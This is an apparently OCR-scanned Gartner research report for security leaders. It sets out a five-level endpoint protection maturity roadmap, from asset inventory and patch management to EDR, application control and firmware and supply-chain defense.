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Endpoints are a primary target in common and advanced cyberattacks. 
Security and risk management leaders should use this guide to evaluate the 
quality of their current endpoint protection and identify next steps to improve 
their resilience. 
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Key Challenges 


There are no clear guides that outline the steps to take to improve the security posture of 
endpoints in a rapidly changing attack landscape. 


Attacker tradecraft is in a constant cycle from targeted nation-state tools to mass-propagated 
automated attack kits. Advanced attacks are moving to fileless attack methods. 


The endpoint protection market is rapidly changing from protection-only to protection and 
detection and response, but has still failed to address the configuration and vulnerability 
assessments necessary to harden endpoints from future attacks. 


Good operations best practices such as configuration vulnerability and patch management are 
the hallmarks of a sophisticated endpoint protection program; however, less mature 
organizations don't have the resources to improve their processes and need to find ways to 
compensate now. 


Staffing levels are often an impediment to improving endpoint security. 


Recommendations 


Security and risk management leaders responsible for endpoint security: 


Analyze the current level of endpoint protection and the potential steps needed to improve. 


Consult with business leaders to identify the biggest potential risks to their goals and negotiate 
an achievable level of endpoint protection to strive for, given resources allocated. 


Strive to implement endpoint maintenance process, and select solutions that offer cloud 
delivery and managed services, if your organization is less mature. 


Invest in improving endpoint security configuration standards and endpoint maintenance 
processes, and shift from protection-only to a detection and response mindset, if your 
organization has reasonably mature endpoint protection. 


Focus on detection and response across the stack, from firmware to authentication, if your 
organization has highly mature endpoint protection. 


Introduction 


Most enterprise leaders recognize the benefits of information security. The need for robust security 
practices that protect business-critical IT systems and data is being constantly reinforced by news 
headlines. But not all organizations face the same level of business risk, and not all organizations 
are starting from the same baseline of endpoint protection. This research examines the 
requirements for endpoint protection from malicious attacks, and provides a list of projects to 
achieve better protection. Figure 1 maps the types of attackers that an organization faces against 
the current or desired levels of endpoint protection. The graph shows roughly when each suggested 
project has the highest impact. 
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Figure 1. Endpoint Project Roadmap: Anticipated Adversary 
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For example, supply chain inspection does not make sense if an organization doesn't even do 
proper patch management. On the other hand, root cause analysis is a logical next step for 
organizations that have already gained experience in detection and response. Moreover, protection 
for endpoints goes beyond just components that go on endpoints and must include, at a minimum, 
application-level network security products, such as secure web gateways (SWGs) and email 
gateways. 


Analysis 


SRM leaders responsible for endpoint security should consider the risks they most want to prevent, 
the level of adversary they're prepared to defend against and their current situation when selecting 
what to do next to improve endpoint resilience to attacks. 
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Not all organizations will, or should, implement sequentially all the protection projects listed above 
in order to achieve the highest level of endpoint security. The cost of improving the security posture 
of the endpoint must be commensurate with the anticipated risks. Organizations that expect to 
defend against advanced attackers should certainly strive for Level 5 as described in Figure 1. Other 
organizations must weigh the risks against the cost and inform management of the level of security 
that is achievable and the potential risks that may not be addressed, given the resources allocated. 
A second key consideration is that organizations at lower levels of sophistication may have to 
accept the reality that they need to become more secure despite broken processes and a lack of 
fundamentals and staff. Managed security services can provide a fast track to improve operational 
security, allowing more focus on strategic priorities. 


Evaluate the Risks 


When deciding the appropriate target level of endpoint security for their organization and the 
appropriate next-step projects, SRM leaders must consider the risk to the business. What type of 
attacks and attackers is the business prepared to defend against? What level of residual risk are 
they prepared to accept? What type of attack would be the most critical to defend against? And 
how mature is their endpoint security today, before they select next-step projects? 


In the current malware landscape, the most prevalent risks to the business fall into seven categories 
(listed roughly in order of prevalence): 


1. Ransomware, potentially causing substantial business downtime 
2. Financial fraud (including personal banking) 


3. Disclosure of personal and private data of customers and employees, creating regulatory and 
reputation risk 


4. Payment Card System attacks creating regulatory and reputation risk 
5. Disclosure of intellectual property, with the potential to reduce competitive advantage. 


6. Relay in attack on partner or third party, or CPU theft such as cryptominng, wasting valuable 
resources 


7. Business disruption attack, causing business downtime and cost to return to normal operations 


Consider the Attacker Landscape 


SRM leaders need to consider the attackers they need to be adequately prepared to encounter. 
Attackers generally come in three varieties: 


1. The automated attacker has a reliable automated attack methodology — typically a 
vulnerability exploit or effective social engineering attack — to infect as many victims as 
possible. These attackers may change tradecraft as mitigations become mainstream, but their 
business model does not include zero-day or manual attack tradecraft. WannaCry was a good 
example of an automated attack. 
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2. The opportunistic persistent attacker uses automated attack techniques to find victims, 
typically by scanning their infrastructure for known vulnerabilities, but then uses a wide variety 
of tradecraft to move lateral and exploit the victim. This level of attacker will grow with increased 
use of automated tools for exploitation and will likely expand targets to popular business 
process software. SamSam ransomware is a good example. 


3. The advanced persistent attacker has a specific goal and will use any method to achieve their 
aim. Advanced attackers will use simple tradecraft if possible, but will escalate to novel attacks 
provided the goal is profitable enough. Nation-state attacks are a good example. 


SRM leaders need to estimate the impact and likelihood of each attack type and attacker profile 
they should be prepared to address, and negotiate with business leaders on an appropriate level of 
security and residual risk. 


When prioritizing endpoint protection projects, SRM leaders must consider the primary attack 
tradecraft. While there is a vast amount of malicious code and techniques, most can be boiled down 
to (1) unconstrained ability to execute file- or script-based code on the host machine, or (2) stealing 
credentials. 


Portable executable file attacks can be filtered with machine learning (ML) and traditional 
signatures and heuristics. But it is a race against time unless the execution environment is locked 
down with some form of application control or, at a minimum, software attestation, which examines 
all unknown code in near real time. Windows is moving in the direction of Mac OS (Gatekeeper) and 
mobile OS (Android, IOS, Chrome OS), to enable file-based execution restrictions managed by a 
corporate app store with appropriate approval workflow over the next five years. Over this time, 
endpoint management will merge with mobile device management. 


Even with perfect control of the execution of processes however, there will still be vulnerabilities that 
can be exploited. OS-level mitigations such as Windows 10 Exploit Guard makes it hard to exploit 
numerous classes of vulnerabilities, but not all. Rapid patching is critical, but in most organizations 
patching is overwhelmingly complex. The art is in managing the vulnerability and patch 
management process. Less mature security organizations should focus on network- and endpoint- 
based vulnerability shielding and patching only the most prevalent and exposed software (see "It's 
Time to Align Your Vulnerability Management Priorities With the Biggest Threats"). The vast majority 
of automated attacks, including ransomware, exploit only a small number of software vendor's 
vulnerabilities. Indeed, 77% of vulnerabilities have no published or observed exploit code. ' 
Focusing on the top five will eliminate a large percentage of the automated malware. More mature 
security organizations with more determined adversaries must be more diligent in patching. 
Determined adversaries will use obscure vulnerabilities and physical attacks. 


Right now, the real battleground is in script-based attacks (i.e., PowerShell, macros, Windows 
Management Instrumentation [WMI], command lines) and commands hiding in obscure execution 
buffers. These powerful utilities are being exploited by packaged exploit kits and advanced 
adversaries’ custom code. Organizations planning to thwart opportunistic persistent attackers must 
ensure that their endpoint protection platform protects against script-based attacks. PowerShell has 
a number of features to make it easier to monitor and control, such as transcript and constrained 
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language model. Group policy should also be tuned for macros execution controls. Organizations 
expecting to face advanced adversaries should focus on restricting and monitoring all script usage 
and entity behavioral detection. 


Firmware may well be the next endpoint battleground’ for advanced adversaries as script controls 
tighten. Firmware is the software that allows the OS to control specific hardware components (for 
example, CD-ROM and disk drives, graphics cards, CPU, BIOS, camera, mic, speakers, battery 
monitors, NICs, trackpad, and mouse). Firmware has low-level kernel and hardware access, and 
modern PCs have 15 to 20 pieces of firmware software loaded into memory on every startup. It is 
rarely patched and often unpatchable. 


Software- and hardware-based supply chain attacks are also trending up. If attackers can get 
code into signed legitimate applications, then they can evade software execution restrictions and 


signature or machine learning controls. Or, if they can attack the component hardware suppliers, 
they can get access to millions of devices. 


Each of these layers will have a false-positive error rate that is greater than zero. Consequently, 
monitoring higher layers for behavior indicative of an attack is crucial to obtain better protection 
against advanced adversaries. EDR capabilities are a prerequisite to enable behavioral-based attack 


detection. The MITRE ATT&CK framework’ provides an excellent overview of common attacker 
techniques and should be used to test behavioral-based detection. Although behavioral-based 
detection is more durable than lower layer attempts to spot specific malicious code, it will have a 
higher false-positive rate and thus needs an experienced operator to determine intent. Less- 
sophisticated organizations should seek fully managed offerings, or, if they are looking to improve 
internal staff, solutions that provide incident response advice to help staff interpret results and 
respond to alerts. Currently, EPP solutions primarily consider endpoint events in behavioral 
detection, but increasingly vendors are integrating and correlate with network events. 


As endpoint OSs move toward the same types of execution restrictions as mobile OSs and arbitrary 
code execution becomes harder, automated and opportunistic attackers will move up the stack to 
the authentication layer, essentially attempting more account takeover attacks through social 
engineering. User and entity behavioral analytics will increasingly be required to detect account 
takeover attacks by spotting abnormal behavior of devices and user accounts. 


Prioritize Projects 


Given these considerations, following are the highest-value projects that SRM leaders responsible 
for endpoint security should undertake to improve endpoint resilience. 


Endpoint Protection, Level 1 


The primary focus at this level should be on beginning to invest in people and process. Begin a 
conversation with the business about the type of threats that are reasonable to expect and the 
corporate resources that are most critical to business goals. Establish an end goal and a timetable, 
and budget to get to the desired level. Initial focus should be on getting an inventory of assets and 
resources. 
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Typical projects include: 


1. Inventory endpoints — Ensure that there is an accurate inventory of all devices that connect to 
the network; this includes security controls in place, and patch and configuration levels. 


2. Inventory, upgrade and audit existing EPP SEG and SWG tools — Many organization at this 
maturity level have outdated versions of security products. Begin the process of bringing these 
tools up to the latest version level that is more than six months old and ask the vendor for 
assistance in auditing the configuration. 


3. Establish a common gold image for endpoints and begin to reduce configuration drift — Use 


the Windows Microsoft Security Compliance Toolkit’ on gold images to assess the configuration 
level. 


4. Complementary EPP — Considering that the state of patch configuration and vulnerability 
management is likely low at this maturity level, it may be prudent to invest in complementary 
EPP solutions to ensure better protection despite poor process. Most new EPP solutions are 
compatible with older AV and cloud-delivered, making them easy to deploy (see "Redefining 
Endpoint Protection for 2017 and 2018"). 


5. Active outsource — If increasing staff levels and staff skills is unlikely in the near term, consider 
outsourcing to MSSPs for security operations and system management (see "Magic Quadrant 
for Managed Security Services, Worldwide’). 


6. Migrate to platform vendors — When selecting new vendors, give more weight to solution 
providers that have multiple solutions with integrated management. 


7. Cloud-first deployment strategy — Favor cloud-deployed solutions to reduce management 
burden and provide faster deployments (See "Top Security and Risk Management Trends’). 


Endpoint Protection, Level 2 


At this stage, the organization should be defining requirements, taking inventory, and developing a 
gap analysis and a plan to close gaps. Focus on getting application- and authentication-level 
inventory. The focus should expand to improve application-level network security and backup and 
restore: 


1. Application inventory and consolidation — Begin to inventory all executable programs, 
determine providence and business value, and consolidate applications and version. Begin to 
establish a new application approval process. 


2. Improve patch management — In this stage, the biggest process benefit is improving patch 
management processes (see "Toolkit: IT Patching Policy"). However, it is important to not get 
too stressed out at this stage by the universe of vulnerabilities. The vast majority of 
opportunistic attacks go after the most common software. So patching the "notorious five" 
(Windows, Office, browsers, Adobe and Java) is the first priority (see "It's Time to Align Your 
Vulnerability Management Priorities With the Biggest Threats"). 
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3. Phishing protection — Invest in advanced phishing protection. Most anti-spam solutions do not 
provide antiphishing with their anti-spam protection. Upgrade to cloud-delivered SWGs to 
reduce management burden (see "Fighting Phishing: Optimize Your Defense"). 


4. Add cloud SWG — On-premises SWGs should be replaced or augmented with cloud-delivered 
SWG protection to expand protection to roaming workers and small offices (see "Using Secure 
Web Gateway Technologies to Protect Users and Endpoints"). 


5. Windows 10 (Credential Guard) and Exploit Prevention — Update Windows OS to Windows 10 
with Credential Guard and Exploit Prevention (see "Windows 10 Enhances Security"). 


6. Backup/restore — Ransomware is the biggest threat to most organizations and destructive 
attacks are on the rise, so a solid endpoint backup strategy is critical (see "Five Key Actions for 
Midsize Enterprises to Improve Storage and Backup"). 


Endpoint Protection, Level 3 


In Level 3, organizations should have most of the requisite tools, but should be improving process 
and establishing a formal security operations center for incident response. Reporting and tracking of 
performance is beginning to be addressed at this level. Focus expands from malware prevention to 
detection and response to catch more opportunistic attacks. Root cause analysis and proactive 
hardening of endpoints begins: 


1. Security operations center — Begin to establish and staff or outsource a security operations 
center. At this stage, integration with a network operations center is likely desirable. Establish 
roles and responsibilities and begin to work on incident response handling guidelines (see 
"Setting Up a Security Operations Center [SOC]"). 


2. Endpoint detection and remediation — Implement an endpoint EDR solution as a primary tool 
for incident response (see "Market Guide for Endpoint Detection and Response Solutions"). 


3. Sandbox (automatic and on demand) — Consider implementing a network-level sandboxing 
service to filter inbound binaries before they get to the endpoint. 


4. Security awareness training — Begin security awareness training programs, particularly around 
account takeover attacks, web and email security best practices, and how to report suspicious 
incidents to the SOC (see "Three Critical Factors in Building a Comprehensive Security 
Awareness Program"). 


5. Improve vulnerability and patch management — Expand vulnerability and patch management 
programs to non-Windows devices and expand to include the universe of applications. 
Configuration management should also begin to establish baseline configurations for non- 
Windows endpoints (see "A Guidance Framework for Developing and Implementing 
Vulnerability Management"). 


6. Privilege access management — Begin to remove admin rights from users. If necessary, 
implement privileged access management for end users (see "Best Practices for Privileged 
Access Management"). 


Page 8 of 12 Gartner, Inc. | G00343353 


7. Privileged credential life cycle management — Develop an inventory and establish a process for 
privileged credential life cycle management, and monitor usage (see "Best Practices to Protect 
Windows Administrator Credentials"). 


8. Multifactor authentication — Implement multifactor authentication for privileged accounts and 
critical business systems (See "Market Guide for User Authentication"). 


9. BYOD program — Start to review usage of employee-owned laptops and critical business 
systems. Leverage multifactor authentication to protect corporate applications. Consider 
supporting employees with corporate-issued endpoint protection solutions, and use network 
access control to enforce usage (see "How to Successfully Navigate the Hurdles of Global- 
Scale BYOD Implementations"). 


10. Cloud workload protection — Build a center of excellence around server workloads apart from 
end-user-focused endpoints (see "Endpoint and Server Security: Common Goals, Divergent 
Solutions"). Protect cloud and on-premises server workloads with products and strategies 
designed specifically for these workloads (see "How to Develop Infrastructure-as-a-Service 
Security Skills"). 


11. Enterprise mobility management — Implement an EMM solution to manage mobile devices and 
build standard policy templates enforced by EMM (see "Top 10 Best Practices for EMM 
Deployment Success"). 


Endpoint Protection, Level 4 


At Level 4, focus expands to all network-connected devices with the adoption of techniques to 
reduce the attack surface for the Internet of Things (loT) and out-of-support OSs. Detection activity 
moves up to the device and user behavioral level. Ramp up use of default deny controls, such as 
applications whitelisting, network segmentation and web isolation, to reduce the attack surface (See 
"Beyond Detection: 5 Core Security Patterns to Prevent Highly Evasive Threats"). Adopt a 
continuous penetration testing mentality. Consider advanced tools such as deception and mobile 
threat defense: 


1. loT/OT protection program — Begin to develop strategies and mitigations to protect 
nonstandard-type devices on the network. All network-attached devices should be in inventory. 
(see "Five Disturbing Trends in loT Security for 2018, and What You Can Do About Them"). 


2. Red team blue team exercises — Move from one-time penetration testing to active detection 
and response exercises. The primary goal at this stage should be to test detection and 
response versus finding specific points of vulnerability to close (see "Using Penetration Testing 
and Red Teams to Assess and Improve Security’). 


3. Threat hunting — Begin threat hunting exercises to detect potential unknown threats (see "How 
to Hunt for Security Threats"). 


4. Application control — Deploy application control for all unpatchable systems and internet- 
facing servers. Consider application control for critical business users or devices (i.e., POS; see 
"How to Successfully Deploy Application Control"). 
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5. Script control — Restrict and monitor script usage. PowerShell has a number of features to 
make it easier to monitor and control, such as transcript and constrained language model. 
Group policy should also be tuned for macros execution control. 


6. Isolation — Consider implementing network isolation solutions for web surfing and email 
document disarm for critical users or devices (see "Innovation Insight for Remote Browser 
Isolation"). 


7. Microsegmentation — Use network-level microsegmentation to isolate unpatchable servers and 
critical business servers. Protect them with a virtual patching tool, which makes the systems 
appear to be patched when probed from the outside (see "Technology Insight for 
Microsegmentation"). 


8. Deception — Consider implementing deception tools to detect active attackers (see 
"Competitive Landscape: Distributed Deception Platforms, 2016"). 


9. Mobile threat defense — Implement mobile threat defense on mobile endpoints used by 
privileged users and high-value-target employees (see "Market Guide for Mobile Threat Defense 
Solutions’). 


Endpoint Protection, Level 5 


This is the refinements stage. Expanding activity will be to inspect the supply chain for downstream 
attacks and those lower into the computing stack, such as firmware attacks: 


1. Supply chain — Focus on equipment manufacture and application supply chain. Consider 
geopolitical component risk (see "Top Security and Risk Management Trends"). 


2. Firmware — Begin to inventory, monitor and patch firmware and microcontrollers. 


3. Continuous threat hunting — Skilled and experience SOC analysts use event data from 
endpoints, network devices and application logs to identify suspicious or malicious activity that 
has bypassed automated controls. Once discovered, the new loAs/loCs are added to the 
prevention layer, forming a closed-loop prevention, detection and response practice (see "How 
to Hunt for Security Threats"). 


4. Orchestration and automation — Begin to automate repetitive security tasks (See "Preparing 
Your Security Operations for Orchestration and Automation Tools"). 


Gartner Recommended Reading 


Some documents may not be available as part of your current Gartner subscription. 
"ITScore for Information Security" 
"Top Security and Risk Management Trends" 


"Top Tips for Communicating Security and Risk to Business Stakeholders" 
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"Develop Existing Security Staff to Excel in the Digital Era" 


"Magic Quadrant for Endpoint Protection Platforms" 


Evidence 


1 "Prioritization to Prediction: Analyzing Vulnerability Remediation Strategies," Research report from 
Kenna Security. 


2 "Top 30 Targeted High Risk Vulnerabilities," United States Computer Emergency Readiness Team 
(US-CERT). 


3 "Malware Found in the Firmware of 141 Low-Cost Android Devices," Bleeping Computer. 


4 Recent examples of supply chain attacks: Ukrainian software MeDoc was used to infect 
computers with Not Petya; CCleaner; and Absolute Software. 


5 "Thousands of Seagate NAS Boxes Host Cryptocurrency Mining Malware," InfoWorld. 
6 Mitre ATT&CK framework, wiki. 
7 The Microsoft Security Compliance Toolkit "allows enterprise security administrators to download, 


analyze, test, edit and store Microsoft-recommended security configuration baselines for Windows 
and other Microsoft products, while comparing them against other security configurations." 
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